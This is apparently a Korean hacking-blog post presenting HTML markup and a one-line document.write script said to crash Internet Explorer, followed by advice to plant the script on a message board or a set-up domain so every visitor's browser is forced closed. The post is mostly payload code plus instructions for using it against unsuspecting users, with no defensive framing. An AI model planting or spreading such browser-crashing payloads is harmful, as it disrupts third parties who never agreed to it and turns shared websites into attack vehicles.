본문 바로가기

Hacking/Web Hacking-

[Web Hacking]IE의 취약점을 이용하여 IE를 강제 종료시켜봅시다.


이번에 올릴 포스팅은 웹 해킹이라고 하기에는 뭐하나,


실용적으로 HTML 하나로 모든 접속자의 IE를 강제종료 시킬 수 있는 기법입니다.


아래와 같은 코드를 작성합니다.


<html><head> 
<style type="text/css"> 
#a { 
        margin:0 10px 10px; 
}

#b { 
        width:100%; 
}

</style> 
<title>Team CSC-</title> 
</head> 
<body> 
<table><tr><td> 
<div id="a"> 
<form id="b"> 
<input type="text" name="test"/> 
</div> 
</td><td width="1"></td></tr></table> 
</body></html>


또 다른 스크립트 문 입니다.


<script>for(x in document.write){document.write(x);}</script>


그 후 메모장에서 .html 로 저장한 뒤 실행해보시면 IE가 강제종료되는 것을 보실 수 있을겁니다.


이 점을 악용하여 


특정 게시판에 업로딩 후 게시물 클릭시 자동 실행되게 스크립트구문을 집어넣으면


접속하는 모든 접속자들의 IE가 강제종료됩니다.(또는 도메인을 개설 후 이동시키는 방법도 ?^-^)